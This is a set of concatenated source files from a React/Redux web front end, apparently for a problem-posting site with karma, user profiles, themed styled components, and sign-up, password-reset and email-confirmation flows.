PostSubmissionForm = reduxForm({
form: 'submission',
onSubmit: submit,
getFormState: ({content}) => content.problemPage.form
})(PostSubmissionForm)
export default PostSubmissionForm
<file_sep>/src/styled-components/problem/SolutionLabel.jsx
// IMPORTANT HAVE TO REFACTOR NAMES, CUZ THIS WILL BE CONFUSED WITH PROBELM BOX ON QUEUE PAGE
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedSolutionLabel = styled.div`
color: green;
margin-right: 10px;
margin-left: 0px;
`
const TryhardSolutionLabel = props => <div {...props}/>
const SolutionLabel = props => <ThemeSelector
buzzfeed={<BuzzfeedSolutionLabel {...props} />}
tryhard={<TryhardSolutionLabel {...props} />}
/>
export default SolutionLabel<file_sep>/src/actions/content/profile/activityPage.jsx
import { appConfig } from '../../../appConfig'
import { activityPageConstants } from '../../../constants/content/profile/activityPage';
import { messageType } from '../../../constants/misc/backendMessageTypes'
function setActivePage(user, pageIndex) {
const request = (activePage) => ({ type: activityPageConstants.SET_ACTIVE_PAGE_REQUEST, activePage })
const success = (activePage, data, hasMore) => ({ type: activityPageConstants.SET_ACTIVE_PAGE_SUCCESS, activePage, data, hasMore })
const failure = (message) => ({ type: activityPageConstants.SET_ACTIVE_PAGE_FAILED, message, messageType: messageType.ERROR })
if (!user) {
return dispatch => {
dispatch(failure('No user specified'))
}
}
return dispatch => {
dispatch(request(pageIndex));
var requestUrl = appConfig.backendUrl + "/u/" + user +"/posts"
requestUrl += (pageIndex && pageIndex > 0) ? "?page=" + pageIndex : ""
fetch(requestUrl, {
method: 'GET',
headers: { 'Content-Type': 'application/json' }
}).then(response => {
// NOTE: perhaps parse 304 statuses, so more efficient
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response
throw error
}
}).then(response => response.json())
.then(body => {
dispatch(success(pageIndex, body.data, body.hasMore))
}).catch(error => {
dispatch(failure(error))
})
}
}
function setUser(user) {
return {
type: activityPageConstants.SET_USER,
user: user
}
}
function reset() {
return {
type: activityPageConstants.RESET
}
}
export const activityPageActions = {
setActivePage,
setUser,
reset
}
<file_sep>/src/styled-components/problem-related/ProblemBox.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
import { sidebarStyleConstants } from '../sidebars/Constants'
const BuzzfeedProblemBox = styled.div`
display: flex;
flex-direction: column;
justify-content: space-between;
width: 250px;
@media(max-width: ${sidebarStyleConstants.SIDEBAR_COLLAPSE}) {
width: 90%;
}
height: 100px;
margin: 20px;
border-radius: 10px;
padding: 10px;
background-color: rgba(67, 0, 50, 0.7);
a {
color: #150050;
}
`
const TryhardProblemBox = props => <div {...props}/>
const ProblemBox = props => <ThemeSelector
buzzfeed={<BuzzfeedProblemBox {...props} />}
tryhard={<TryhardProblemBox {...props} />}
/>
export default ProblemBox<file_sep>/src/styled-components/header/HeaderEntries.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
import { headerStyleConstants } from './Constants'
const BuzzfeedHeader = styled.ul`
list-style-type: none;
display: flex;
flex-wrap: wrap;
justify-content: flex-start;
float: left;
@media(max-width: ${headerStyleConstants.HEADER_COLLAPSE_LOGGED_IN_CAPTION}) {
justify-content: space-around;
}
`
const TryhardHeader = props => <ul {...props}/>
const Header = props => <ThemeSelector
buzzfeed={<BuzzfeedHeader {...props} />}
tryhard={<TryhardHeader {...props} />}
/>
export default Header<file_sep>/src/styled-components/defaults/ButtonsCenteredDiv.jsx
import React from 'react'
import styled from 'styled-components';
import ButtonDiv from './ButtonDiv'
import ThemeSelector from '../ThemeSelector'
const BuzzfeedRepliesButtonBlock = styled(ButtonDiv)`
justify-content: center;
`
const TryhardRepliesButtonBlock = props => <button {...props} />
const RepliesButtonBlock = props => <ThemeSelector
buzzfeed={<BuzzfeedRepliesButtonBlock {...props} />}
tryhard={<TryhardRepliesButtonBlock {...props} />}
/>
export default RepliesButtonBlock;
<file_sep>/src/components/signup/SignUpForm.jsx
import React from 'react'
import { Field, reduxForm } from 'redux-form'
import renderField from '../form/RenderField'
import { signupActions } from '../../actions/content/signup'
import FormButton from '../../styled-components/form/FormButton'
const submit = (values, dispatch, props) => {
dispatch(signupActions.signup(values))
}
const validate = values => {
const errors = {}
if (!values.username) {
errors.username = 'Required'
}
if (!values.password) {
errors.password = '<PASSWORD>'
}
if (!values.email) {
errors.email = 'Required'
}
if (!values.confirmPassword) {
errors.confirmPassword = '<PASSWORD>'
}
if (values.confirmPassword !== values.password) {
errors.confirmPassword = 'Passwords don\'t match'
}
return errors
}
const asyncBlurFields = ['username', 'password', 'email']
const SignUpForm = props => {
const { handleSubmit } = props;
return (
<form onSubmit={handleSubmit}>
<Field name="username" component={renderField} type="text" label="Username" alignLeft/>
<Field name="password" component={renderField} type="password" label="Password" placeholder="at least 8 characters" alignLeft/>
<Field name="confirmPassword" component={renderField} type="password" label="Confirm password" alignLeft/>
<Field name="email" component={renderField} type="text" label="Email" alignLeft/>
<Field name="firstName" component={renderField} type="text" label="First Name" alignLeft/>
<Field name="lastName" component={renderField} type="text" label="Last Name" alignLeft/>
<FormButton type="submit" alignLeft>Submit</FormButton>
</form>
)
}
export default reduxForm({
form: 'form',
validate,
asyncValidate: (values, dispatch, props, blurredField) => signupActions.validateField(values, blurredField),
asyncBlurFields,
onSubmit: submit,
getFormState: ({content}) => content.signup.form
})(SignUpForm)
<file_sep>/src/reducers/global.jsx
/*
IMPORTANT HOW TO WRAP SHARED STUFF INTO ALL COMPONENTS (SO THAT SHARED STUFF IS UPDATED ANYWHERE)
*/
import { globalConstants, themes, defaultTheme } from "../constants/global"
const defaultHierarchy = {Index:{} }
const defaultLinQueues = ['Index']
const defaultState = {hierarchy: defaultHierarchy, linQueues: defaultLinQueues, theme:defaultTheme, linQueuesDisplayed: false, themesDisplayed: false, themes: themes}
export function globalReducer(state = defaultState, action) {
switch (action.type) {
case globalConstants.HIERARCHY_LOAD_REQUEST:
return { ...state, hierarchy: defaultHierarchy }
case globalConstants.HIERARCHY_LOAD_SUCCESS:
return { ...state, hierarchy: action.hierarchy || defaultHierarchy }
case globalConstants.HIERARCHY_LOAD_FAILED:
return { ...state, hierarchy: state.hierarchy || defaultHierarchy }
case globalConstants.LIN_QUEUES_LOAD_REQUEST:
return { ...state, linQueues: defaultLinQueues }
case globalConstants.LIN_QUEUES_LOAD_SUCCESS:
return { ...state, linQueues: action.queues }
case globalConstants.LIN_QUEUES_LOAD_FAILED:
return { ...state, linQueues: state.linQueues || defaultLinQueues }
case globalConstants.LIN_QUEUES_DISPLAY:
return { ...state, linQueuesDisplayed: true }
case globalConstants.LIN_QUEUES_HIDE:
return { ...state, linQueuesDisplayed: false }
case globalConstants.THEMES_DISPLAY:
return { ...state, themesDisplayed: true }
case globalConstants.THEMES_HIDE:
return { ...state, themesDisplayed: false }
case globalConstants.SET_THEME:
if (!Object.keys(themes).includes(action.theme)) {
return state;
}
return { ...state, theme: action.theme}
default:
return state
}
}<file_sep>/src/styled-components/problem-related/ProblemBoxMeta.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedProblemBoxMeta = styled.ul`
display: flex;
justify-content: space-between;
font-size: 11px;
list-style-type: none;
padding: 0px;
`
const TryhardProblemBoxMeta = props => <ul {...props}/>
const ProblemBoxMeta = props => <ThemeSelector
buzzfeed={<BuzzfeedProblemBoxMeta {...props} />}
tryhard={<TryhardProblemBoxMeta {...props} />}
/>
export default ProblemBoxMeta<file_sep>/src/components/home/Homepage.jsx
import React from 'react';
import QueueSidebar from '../queue/QueueSidebar'
import ContentDiv from '../../styled-components/defaults/ContentDiv'
import PageDiv from '../../styled-components/defaults/PageDiv'
export default class Homepage extends React.Component {
render() {
return (
<PageDiv>
<QueueSidebar />
<ContentDiv sidebar>
<h2>
Welcome {(this.props.user && this.props.user.username) ? this.props.user.username : 'guest'}
</h2>
No clue what should be added to the homepage
</ContentDiv>
</PageDiv>
);
}
}
<file_sep>/src/components/issues/InternetExplorer.jsx
import React from "react";
import { Link } from "react-router-dom"
const IEPage = props => (
<div>
This page is for Zoomers only, no Boomers allowed<br/>
GO AND DOWNLOAD A REAL <Link to='https://www.torproject.org/download/'>BROWSER</Link>
</div>
)
export default IEPage<file_sep>/src/reducers/content/statistics.jsx
import { combineReducers } from 'redux'
import economyPageReducer from './statistics/economyPage'
import scoreboardPageReducer from './statistics/scoreboardPage'
export default combineReducers({
economyPage: economyPageReducer,
scoreboard: scoreboardPageReducer
})<file_sep>/src/styled-components/statistics/ScoreboardPageBar.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedScoreboardPageBar = styled.table`
text-align: center;
margin: auto;
border-spacing: 10px;
tbody td {
background: transparent;
border-radius: 3px;
background-color: rgba(67, 0, 50, 0.35);
color: #962020;
margin: 2px 1em;
padding: 0.25em 1em;
font-weight: bold;
a {
text-decoration: none;
}
a:hover {
text-decoration: underline;
}
}
`
const TryhardScoreboardPageBar = props => <table {...props}/>
const ScoreboardPageBar = props => <ThemeSelector
buzzfeed={<BuzzfeedScoreboardPageBar {...props} />}
tryhard={<TryhardScoreboardPageBar {...props} />}
/>
export default ScoreboardPageBar<file_sep>/src/actions/content/confirm/emailChange.jsx
import { appConfig } from '../../../appConfig'
import { confirmEmailChangeConstants } from '../../../constants/content/confirm/emailChange'
import { messageType } from '../../../constants/misc/backendMessageTypes'
function confirm(confirmationToken) {
const request = () => ({type: confirmEmailChangeConstants.REQUEST})
const success = () => ({type: confirmEmailChangeConstants.SUCCESS})
const failure = (message) => ({type: confirmEmailChangeConstants.FAILED, message, messageType: messageType.ERROR})
return dispatch => {
dispatch(request())
fetch(appConfig.backendUrl + "/verify/newEmail", {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({emailToken: confirmationToken})
}).then(response => {
if (response.status >= 200 && response.status < 400) {
dispatch(success())
} else {
var error = new Error(response.statusText)
error.response = response
throw error
}
}).catch(error => {
dispatch(failure(JSON.stringify(error)))
})
}
}
export const confirmEmailChangeActions = {
confirm
}
<file_sep>/src/components/form/RenderField.jsx
import React from 'react'
import InputDiv from '../../styled-components/form/InputDiv'
import ValidationMessage from '../../styled-components/form/ValidationMessage'
const renderField = ({
input,
label,
type,
placeholder,
alignLeft,
meta: {asyncValidating, touched, error}
}) => (
<InputDiv alignLeft={alignLeft}>
{label && <label>{label}</label>}
<div>
<input {...input} type={type} placeholder={placeholder || label} />
{touched && error && <ValidationMessage>{error}</ValidationMessage>}
</div>
</InputDiv>
)
export default renderField<file_sep>/src/components/header/ThemeDropdown.jsx
import React from 'react';
import { connect } from 'react-redux'
import StyledThemeDropdown from '../../styled-components/header/ThemeDropdown'
import ThemeDropdownEntries from '../../styled-components/header/ThemeDropdownEntries'
import { globalActions } from '../../actions/global'
const mapStateToProps = state => ({
displayed: state.global.themesDisplayed,
currentTheme: state.global.theme,
themes: state.global.themes || {}
})
const mapDispatchToProps = dispatch => {
return {
show: () => dispatch(globalActions.showThemes()),
hide: () => dispatch(globalActions.hideThemes()),
setTheme: (theme) => dispatch(globalActions.setTheme(theme))
}
}
class ThemeDrowdown extends React.Component {
componentWillUnmount() {
if (this.props.displayed) {
this.props.hide()
}
}
render() {
const themeDivs = (
<ThemeDropdownEntries>
{Object.keys(this.props.themes).map((theme, index) => (
<li key={index}>
<div onClick={() => this.props.setTheme(theme)}>{this.props.themes[theme].label}</div>
</li>
))}
</ThemeDropdownEntries>
)
const currentTheme = this.props.themes[this.props.currentTheme];
return (
<div>
<StyledThemeDropdown className="button" onClick={this.props.displayed ? this.props.hide : this.props.show}>{currentTheme.textWhenSelected || currentTheme.label}</StyledThemeDropdown>
{ this.props.displayed && themeDivs}
</div>
)
}
}
export default connect(mapStateToProps, mapDispatchToProps)(ThemeDrowdown)<file_sep>/src/components/profile/TransactionPage/TransactionBox.jsx
import React from 'react';
import { Link } from 'react-router-dom'
import StyledTransactionBox from '../../../styled-components/profile/TransactionBox'
import TransactionBoxMeta from '../../../styled-components/profile/TransactionBoxMeta'
import TransactionBoxMetaSection from '../../../styled-components/profile/TransactionBoxMetaSection'
const TransactionBox = (props) => (
<StyledTransactionBox>
<TransactionBoxMeta>
<TransactionBoxMetaSection grow>
{new Date(props.created).toLocaleDateString()}
</TransactionBoxMetaSection>
<TransactionBoxMetaSection>
<Link to={'/q/' + props.queue}>{props.queue}</Link>
{' Karma value: ' + props.karma_value}
</TransactionBoxMetaSection>
<TransactionBoxMetaSection>
{'Monetary value: ' + props.monetary_value + "$"}
</TransactionBoxMetaSection>
</TransactionBoxMeta>
{props.description}<br/>
</StyledTransactionBox>
)
export default TransactionBox
<file_sep>/src/constants/misc/dateTimeOptions.jsx
export const dateTimeOptions = {
year: 'numeric',
month: 'numeric',
day: 'numeric',
hour: 'numeric',
minute: 'numeric'
}
export const dateTimeDefaultLocale = 'en-GB'<file_sep>/src/components/confirm/PasswordChange.jsx
import React from 'react';
import { connect } from 'react-redux'
import { Link } from 'react-router-dom'
import { confirmPasswordChangeStages } from '../../constants/content/confirm/passwordChange'
import { confirmPasswordChangeActions } from '../../actions/content/confirm/passwordChange'
import PasswordChangeForm from './PasswordChange/PasswordChangeForm'
import ContentDiv from '../../styled-components/defaults/ContentDiv'
import BackendMessage from '../../styled-components/defaults/BackendMessage'
const mapStateToProps = state => state.content.confirm.passwordChange.page
const mapDispatchToProps = dispatch => ({
verify: (token) => dispatch(confirmPasswordChangeActions.verify(token)),
reset: () => dispatch(confirmPasswordChangeActions.reset())
})
class ConfirmPasswordChangePage extends React.Component {
componentDidMount() {
this.props.verify(this.props.token)
}
componentWillUnmount(){
this.props.reset()
}
render() {
switch (this.props.stage) {
case confirmPasswordChangeStages.COMPLETED:
return (
<ContentDiv>
{'Password successfully changed, click '}
<Link to="/login">here</Link>
{' to log in'}
</ContentDiv>
)
case confirmPasswordChangeStages.SUBMITTING_FORM:
return (
<ContentDiv>
<BackendMessage messageType={this.props.messageType}>
{this.props.message}
</BackendMessage>
<PasswordChangeForm token={this.props.token} />
</ContentDiv>
)
case confirmPasswordChangeStages.INVALID_TOKEN:
default:
return (
<ContentDiv>
<BackendMessage messageType={this.props.messageType}>
{this.props.message}
</BackendMessage>
</ContentDiv>
)
}
}
}
export default connect(mapStateToProps, mapDispatchToProps)(ConfirmPasswordChangePage)
<file_sep>/src/styled-components/defaults/Button.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
export const BuzzfeedButton = styled.button`
background: transparent;
border-radius: 3px;
${props => !props.noBorder && 'border: 2px solid rgb(17,0,73);'}
color: rgb(17,0,73);
margin: 2px 1em;
padding: 0.25em 1em;
:hover {
text-decoration: underline;
cursor: pointer;
}
`
export const TryhardButton = props => <button {...props} noBorder={undefined}/>
const Button = props => <ThemeSelector
buzzfeed={props.buzzfeed || <BuzzfeedButton {...props} />}
tryhard={props.tryhard || <TryhardButton {...props} />}
/>
export default Button<file_sep>/src/components/form/ReduxFormSelect.jsx
import React from 'react'
import ReactSelect from '../../styled-components/form/ReactSelect'
const ReduxFormSelect = props => {
const { input, options, label, defaultValue, defaultInputValue } = props;
if (defaultValue) {
// LOOOOL FIXOL SOM TOOOOOs
// UPDATE: <NAME>, FUNKTIONIERT NICHT :D :D
input.value = defaultValue
}
return (
<div>
{label && <label>{label}</label>}
<ReactSelect
{...input}
onChange={value => {
input.onChange(value)
}}
onBlur={() => input.onBlur(input.value)}
options={options}
defaultValue={defaultValue}
defaultInputValue={defaultInputValue}
/>
</div>
)
}
export default ReduxFormSelect<file_sep>/src/reducers/content/forgotPwdPage.jsx
import { reducer } from 'redux-form'
import { combineReducers } from 'redux'
import { forgotPwdConstants, forgotPwdStages } from '../../constants/content/forgotPwdPage'
import { appConfig } from '../../appConfig'
const defaultState = {
stage: forgotPwdStages.SUBMITTING_FORM
}
const forgotPwdPageReducer = (state = defaultState, action) => {
switch (action.type) {
case forgotPwdConstants.REQUEST:
return {
stage: forgotPwdStages.SUBMITTING_FORM,
message: "Waiting for server response",
messageType: action.messageType
}
case forgotPwdConstants.SUCCESS:
return {
stage: forgotPwdStages.EMAIL_SENT,
message: {
message: appConfig.productionMail ? "YUH! check ur emeil adres, thereee should be an confermation link for pwd reset, so u dont have to regooster again. To do so follow these steps" : "Hello, this is just a demo, which doesn't use real smtp server - testing email service is used instead. That means, to complete the process",
steps: appConfig.productionMail ? [
"Open your favourite email @gmail.biz",
"Click the email you just received",
"click the link",
"PROFIT"
] : [
"go to \"https://ethereal.email\"",
"log in with following credentials:\n\tusername: \"<EMAIL>\"\n\tpassword:\"<PASSWORD>\"",
"in section messages should be your email, i.e. addressed to \"" + action.user.username + "\" with email adress \"" + action.user.email + "\""
]
},
messageType: action.messageType
}
case forgotPwdConstants.FAILED:
return {
stage: forgotPwdStages.SUBMITTING_FORM,
message: action.message,
messageType: action.messageType
}
case forgotPwdConstants.RESET:
return defaultState
default:
return state
}
}
const forgotPwdFormReducer = reducer
export default combineReducers({
page: forgotPwdPageReducer,
form: forgotPwdFormReducer
})
<file_sep>/src/styled-components/profile/TransactionBox.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedTransactionBox = styled.div`
display: flex;
flex-direction: column;
width: 90%;
margin: 20px;
border-radius: 10px;
padding: 10px;
background-color: rgba(67, 0, 50, 0.7);
`
const TryhardTransactionBox = props => <div {...props}/>
const TransactionBox = props => <ThemeSelector
buzzfeed={<BuzzfeedTransactionBox {...props} />}
tryhard={<TryhardTransactionBox {...props} />}
/>
export default TransactionBox<file_sep>/src/constants/content/confirm/emailChange.jsx
export const confirmEmailChangeConstants = {
REQUEST: "CONFIRM_EMAIL_CHANGE_REQUEST",
SUCCESS: "CONFIRM_EMAIL_CHANGE_SUCCESS",
FAILED: "CONFIRM_EMAIL_CHANGE_FAILED"
}<file_sep>/src/reducers/content/statistics/economyPage.jsx
import { economyPageConstants } from '../../../constants/content/statistics/economyPage'
const defaultState = {}
function economyPageReducer(state = defaultState, action) {
switch (action.type) {
case economyPageConstants.LOAD_KARMA_VALUES_REQUEST:
return {
message: "Loading data...",
messageType: action.messageType
}
case economyPageConstants.LOAD_KARMA_VALUES_SUCCESS:
return {
karmaValues: action.data
}
case economyPageConstants.LOAD_KARMA_VALUES_FAILED:
return {
message: action.message,
messageType: action.messageType,
karmaValues: state
}
default:
return state
}
}
export default economyPageReducer
<file_sep>/src/styled-components/header/HeaderDiv.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
import { headerStyleConstants } from './Constants'
//float: ${props => props.float || 'left'};
const BuzzfeedHeaderDiv = styled.div`
display: flex;
flex-wrap: wrap;
justify-content: ${props => props.shrink ? 'center' : 'flex-start'};
${props => props.grow && 'flex-grow: 1;'}
${props => props.shrink && 'flex-shrink: 1;'}
vertical-align: middle;
padding: 10px;
${props => `font-size: ${props.fontSize || '14px'}` };
color: rgb(17,0,73);
font-family: Verdana, Arial, Helvetica, sans-serif;
@media(max-width: ${headerStyleConstants.HEADER_COLLAPSE_LOGGED_IN_CAPTION}) {
${props => props.collapse && "display: none;"}
}
`
const TryhardHeaderDiv = props =><div {...props} shrink={undefined} grow={undefined} collapse={undefined} fontSize={undefined}/>
const HeaderDiv = props => <ThemeSelector
buzzfeed={<BuzzfeedHeaderDiv {...props} />}
tryhard={<TryhardHeaderDiv {...props} />}
/>
export default HeaderDiv<file_sep>/src/components/routes/PrivateRoute.jsx
import React from "react"
import { Route } from "react-router-dom";
import Auth from '../auth/Auth'
const PrivateRoute = ({loggedIn, render, ...rest}) => {
return (
<Route
{...rest}
render={(routeProps) => {
return <Auth loggedIn={loggedIn} component={() => render(routeProps)} />
}
}
/>
);
}
export default PrivateRoute<file_sep>/src/constants/content/profile/profilePage.jsx
export const profilePageConstants = {
LOAD_USER_REQUEST: 'PROFILE_PAGE_LOAD_USER_REQUEST',
LOAD_USER_SUCCESS: 'PROFILE_PAGE_LOAD_USER_SUCCESS',
LOAD_USER_FAILED: 'PROFILE_PAGE_LOAD_USER_FAILED'
}<file_sep>/src/components/queue/QueueSidebarEntries.jsx
import React from 'react';
import { Link } from "react-router-dom"
const QueueSidebarEntries = ({queues, baseUrl}) => {
const keys = Object.keys(queues);
return (
<ul>
{keys.map(k => (
<li key={k}>
<Link to={baseUrl + '/' + k}>{k}</Link>
<QueueSidebarEntries queues={queues[k]} baseUrl={baseUrl}/>
</li>
))}
</ul>
);
}
export default QueueSidebarEntries<file_sep>/src/components/problem/ProblemPage/Submission.jsx
import React from 'react'
import { connect } from 'react-redux'
import { Link } from "react-router-dom"
import MarkdownRender from '../../form/MarkdownRender'
import Reply from './Reply'
import PostReplyForm from './PostReplyForm'
import { problemPageActions } from '../../../actions/content/problemPage'
import SubmissionDiv from '../../../styled-components/problem/SubmissionDiv'
import SubmissionBox from '../../../styled-components/problem/SubmissionBox'
import ContentInfo from '../../../styled-components/problem/ContentInfo'
import Button from '../../../styled-components/defaults/Button'
import ButtonDiv from '../../../styled-components/defaults/ButtonDiv'
import RepliesButton from '../../../styled-components/problem/RepliesButton'
import RepliesButtonDiv from '../../../styled-components/problem/RepliesButtonDiv'
import SolutionLabel from '../../../styled-components/problem/SolutionLabel'
import { dateTimeDefaultLocale, dateTimeOptions } from '../../../constants/misc/dateTimeOptions'
const mapStateToProps = (state, ownProps) => {
const submissionState = state.content.problemPage.page.submissionEntries[ownProps.page || 0][ownProps.submissionId]
return {
content: submissionState.content,
replyEntries: submissionState.replyEntries,
repliesHidden: submissionState.repliesHidden,
user: submissionState.submitted_by.username,
created: submissionState.created
}
}
const mapDispatchToProps = (dispatch, ownProps) => ({
loadReplyPage: (page) => dispatch(problemPageActions.loadReplyPage(ownProps.submissionId, page)),
hideReplies: () => dispatch(problemPageActions.hideReplies(ownProps.submissionId)),
acceptSubmission: () => dispatch(problemPageActions.acceptSubmission(ownProps.submissionId, ownProps.problem, ownProps.token)),
selectReplyForm: () => dispatch(problemPageActions.selectReplyForm(ownProps.submissionId))
})
class Submission extends React.Component {
render() {
const replyEntries = this.props.replyEntries.reduce((acc,cv) => Object.assign(acc,cv), {})
const submissionBox = (
<SubmissionBox solution={this.props.isSolution}>
<ContentInfo>
{this.props.isSolution && <SolutionLabel>SOLUTION</SolutionLabel>}
{new Date(this.props.created).toLocaleDateString(dateTimeDefaultLocale, dateTimeOptions)}
{this.props.user && <Link to={'/u/' + this.props.user}>{this.props.user}</Link>}
</ContentInfo>
<MarkdownRender source={this.props.content} />
<ButtonDiv>
{this.props.acceptButton && <Button onClick={this.props.acceptSubmission}>Accept Submission</Button>}
{this.props.replyButton && <Button onClick={this.props.selectReplyForm}>Reply</Button>}
</ButtonDiv>
</SubmissionBox>
)
if (!this.props.wrapper) {
return submissionBox
}
return (
<SubmissionDiv>
{submissionBox}
{this.props.hasActiveReplyForm && <PostReplyForm token={this.props.token} submission={this.props.submissionId} problem={this.props.problem}/>}
{this.props.repliesHidden === false && (
<ul>
{
Object.keys(replyEntries).map((e, index) => (
<li key={index}>
<Reply
content={replyEntries[e].content}
created={replyEntries[e].created}
user={replyEntries[e].submitted_by.username}
/>
</li>))
}
</ul>
)}
{
this.props.loadRepliesButton &&
(
<RepliesButtonDiv>
{this.props.paging && this.props.paging.hasMore && <RepliesButton onClick={() => this.props.loadReplyPage(this.props.paging.page + 1)}>{'Load ' + (!this.props.repliesHidden ? 'More ' : '') + 'Replies'}</RepliesButton>}
{!this.props.repliesHidden && <RepliesButton onClick={() => this.props.hideReplies()}>Hide Replies</RepliesButton>}
</RepliesButtonDiv>
)
}
</SubmissionDiv>
)
}
}
export default connect(mapStateToProps, mapDispatchToProps)(Submission)
<file_sep>/src/App.jsx
import React from "react";
import { BrowserRouter as Router, Route, Redirect, Switch } from "react-router-dom";
import { connect } from 'react-redux'
import IEPage from './components/issues/InternetExplorer'
import Homepage from "./components/home/Homepage"
import Header from "./components/header/Header"
import PrivateRoute from "./components/routes/PrivateRoute"
import NonAuthRoute from './components/routes/NonAuthRoute'
import ProfileRoute from "./components/routes/ProfileRoute"
import SignUpPage from "./components/signup/SignUpPage"
import Login from "./components/auth/Login"
import LogoutPage from './components/auth/LogoutPage'
import ForgotPassword from './components/forgotpwd/ForgotPassword'
import QueuePage from "./components/queue/QueuePage"
import ProblemPage from "./components/problem/ProblemPage"
import BoostPage from "./components/problem/BoostPage"
import SubmitProblemPage from "./components/queue/SubmitProblemPage"
import ProfilePage from "./components/profile/ProfilePage"
import ActivityPage from "./components/profile/ActivityPage"
import PersonalInformationPage from './components/profile/PersonalInformationPage'
import PremiumPage from './components/profile/PremiumPage'
import TransactionPage from './components/profile/TransactionPage'
import EconomyPage from "./components/statistics/EconomyPage"
import ScoreboardPage from "./components/statistics/ScoreboardPage"
import ConfirmRegistrationPage from "./components/confirm/Registration"
import ConfirmPasswordChangePage from "./components/confirm/PasswordChange"
import ConfirmEmailChangePage from "./components/confirm/EmailChange"
import ConfirmUsernameChangePage from "./components/confirm/UsernameChange"
import { authActions } from './actions/auth'
import AppDiv from './styled-components/App'
const parseUrlParam = (routeProps, paramName) => new URLSearchParams(routeProps.location.search).get(paramName)
class App extends React.Component {
componentDidMount() {
this.props.verify(this.props.token)
}
componentDidUpdate(prevProps) {
if (prevProps.token !== this.props.token) {
this.props.verify(this.props.token)
}
}
render() {
const loggedIn = !!this.props.user
if((navigator.userAgent.indexOf("MSIE") !== -1 ) || (!!document.documentMode === true )) { //IF IE > 10
return (<IEPage />)
}
return (
<Router>
<AppDiv>
<Header logout={this.props.logout} loggedIn={loggedIn} username={this.props.user ? this.props.user.username : null}/>
<Switch>
<Route exact path="/" render={() => <Homepage user={this.props.user}/>} />
<NonAuthRoute path="/signup" loggedIn={loggedIn} render={() => <SignUpPage/> } />
<NonAuthRoute path="/forgotpwd" loggedIn={loggedIn} render={(routeProps) => <ForgotPassword loggedIn={loggedIn} redirect={(routeProps.location && routeProps.location.state) ? routeProps.location.state.from : null}/>}/>
<Route path="/login" loggedIn={loggedIn} render={(routeProps) => <Login loggedIn={loggedIn} redirect={(routeProps.location && routeProps.location.state) ? routeProps.location.state.from : '/'}/>} />
<Route exact path="/q/:name" render={(routeProps) => <QueuePage queue={routeProps.match.params.name} loggedIn={loggedIn}/>} />
<PrivateRoute path="/submitProblem" render={(routeProps) => <SubmitProblemPage token={this.props.token} urlQueue={parseUrlParam(routeProps, 'q')}/>} loggedIn={loggedIn}/>
<Route exact path="/problem/:id" render={ (routeProps) => <ProblemPage loggedIn={loggedIn} token={this.props.token} problemId={routeProps.match.params.id} user={this.props.user}/>} />
<Route path="/problem/:id/boost" render={(routeProps) => loggedIn && <BoostPage token={this.props.token} problemId={routeProps.match.params.id} loggedIn={loggedIn}/>} />
<Route exact path="/u/:username" render={
(routeProps) => <ProfilePage
viewer={this.props.user ? this.props.user.username : null}
user={routeProps.match.params.username}
loggedIn={loggedIn}
/> }/>
<Route path="/u/:username/activity" render={
(routeProps) => <ActivityPage
viewer={this.props.user ? this.props.user.username : null}
user={routeProps.match.params.username}
loggedIn={loggedIn}
/> }/>
<ProfileRoute path={'/u/:username/personal'} render={(routeProps) => (<PersonalInformationPage user={routeProps.match.params.username} token={this.props.token}/>)} loggedIn={loggedIn} viewer={this.props.user ? this.props.user.username : null}/>
<ProfileRoute path={'/u/:username/premium'} render={(routeProps) => (<PremiumPage user={routeProps.match.params.username}/>)} loggedIn={loggedIn} viewer={this.props.user ? this.props.user.username : null}/>
<ProfileRoute path={'/u/:username/transactions'} render={(routeProps) => <TransactionPage user={routeProps.match.params.username} token={this.props.token}/>} loggedIn={loggedIn} viewer={this.props.user ? this.props.user.username : null}/>
<Route path="/statistics/economy" render={() => <EconomyPage token={this.props.token}/>} loggedIn={loggedIn}/>
<Route path="/statistics/scoreboard/:queue" render={(routeProps) => <ScoreboardPage token={this.props.token} queue={routeProps.match.params.queue} urlPage={Number(parseUrlParam(routeProps, 'page')) || 1} />} loggedIn={loggedIn} />
<Route path='/logout' render={(routeProps) => <LogoutPage loggedIn={loggedIn} redirect={(routeProps.location && routeProps.location.state) ? routeProps.location.state.from : '/login'} logout={this.props.logout}/>}/>
<NonAuthRoute path="/confirm/registration/:token" loggedIn={loggedIn} render={(routeProps) => <ConfirmRegistrationPage token={routeProps.match.params.token}/>} />
<NonAuthRoute path="/confirm/passwordChange/:token" loggedIn={loggedIn} render={(routeProps) => <ConfirmPasswordChangePage token={routeProps.match.params.token}/>} />
<NonAuthRoute path="/confirm/emailChange/:token" loggedIn={loggedIn} render={(routeProps) => <ConfirmEmailChangePage token={routeProps.match.params.token}/>} />
<NonAuthRoute path="/confirm/usernameChange/:token" loggedIn={loggedIn} render={(routeProps) => <ConfirmUsernameChangePage token={routeProps.match.params.token}/>} />
{loggedIn && <Redirect from='/profile' to={'/u/' + this.props.user.username} />}
</Switch>
</AppDiv>
</Router>
)
}
}
const mapStateToProps = (state) => ({
// AUTH REDUCER
user: state.auth.user,
token: state.auth.token
})
const mapDispatchToProps = (dispatch) => ({
// AUTH
logout: token => dispatch(authActions.logout(token)),
login: (username, pwd) => dispatch(authActions.login(username, pwd)),
verify: token => dispatch(authActions.verify(token))
})
export default connect(mapStateToProps, mapDispatchToProps)(App)
<file_sep>/src/constants/content/signUpPage.jsx
export const signupConstants = {
REQUEST: 'SIGNUP_REQUEST',
SUCCESS: 'SIGNUP_SUCCESS',
FAILED: 'SIGNUP_FAILED',
RESET: 'SIGNUP_PAGE_RESET'
};
export const signupStages = {
SUBMITTING_FORM: 0,
COMPLETED: 1
}
